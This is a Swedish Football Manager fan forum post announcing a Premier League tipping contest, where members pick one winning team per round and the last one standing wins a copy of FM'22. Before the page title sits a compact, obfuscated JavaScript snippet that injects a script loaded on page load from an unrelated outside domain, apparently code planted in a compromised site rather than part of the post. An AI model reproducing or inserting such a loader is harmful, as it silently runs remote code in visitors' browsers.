;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tippa PL-fotboll och vinn FM’22 – FMSweden
Meny Stäng

Tippa PL-fotboll och vinn FM’22

Hej alla glada medlemmar!

Förra året körde jag ett Europatips här på sidan där vinnaren vann ett exemplar av FM’21. Jag tänkte att vi kör en tävling i år igen men denna gång bara Premier League och med ett lite annat format som jag kopierat rakt av från Twitter (all cred till SegundaSpanish).

Hur ser spelreglerna ut?

Inför varje spelomgång väljer du 1 lag du tror kommer vinna sin omgång. Skulle det vara en osynkad omgång kommer jag lägga ut vilka lag som man kan välja mellan.

Om laget VINNER är du vidare till nästa omgång.

Om laget KRYSSAR är du vidare men förlorar ett “liv” (vi kör att alla har tre “kryssliv).

Om laget FÖRLORAR är du ute.

Kruxet: Du får INTE välja samma lag två gånger. Har du valt t.ex. Liverpool en vecka kan du aldrig välja dom igen.

Vinnare: Den som är sist kvar vinner ett FM’22. Åker flera ut samtidigt sista veckan blir det omspel för dom.

Hur gör jag för att delta?

Börja helt enkelt med att svara i denna tråd på detta inlägg med ett lag som du tror kommer vinna under den första omgången som startar imorgon. Eftersom det är så sent denna tävling kommer upp så tillåter jag svar ända fram tills Tottenham – City börjar på söndag. Förutsatt att man skriver ett lag som inte börjat spela sin match än såklart.

Please wait...

Liknande Inlägg

3 kommentarer

Lämna ett svar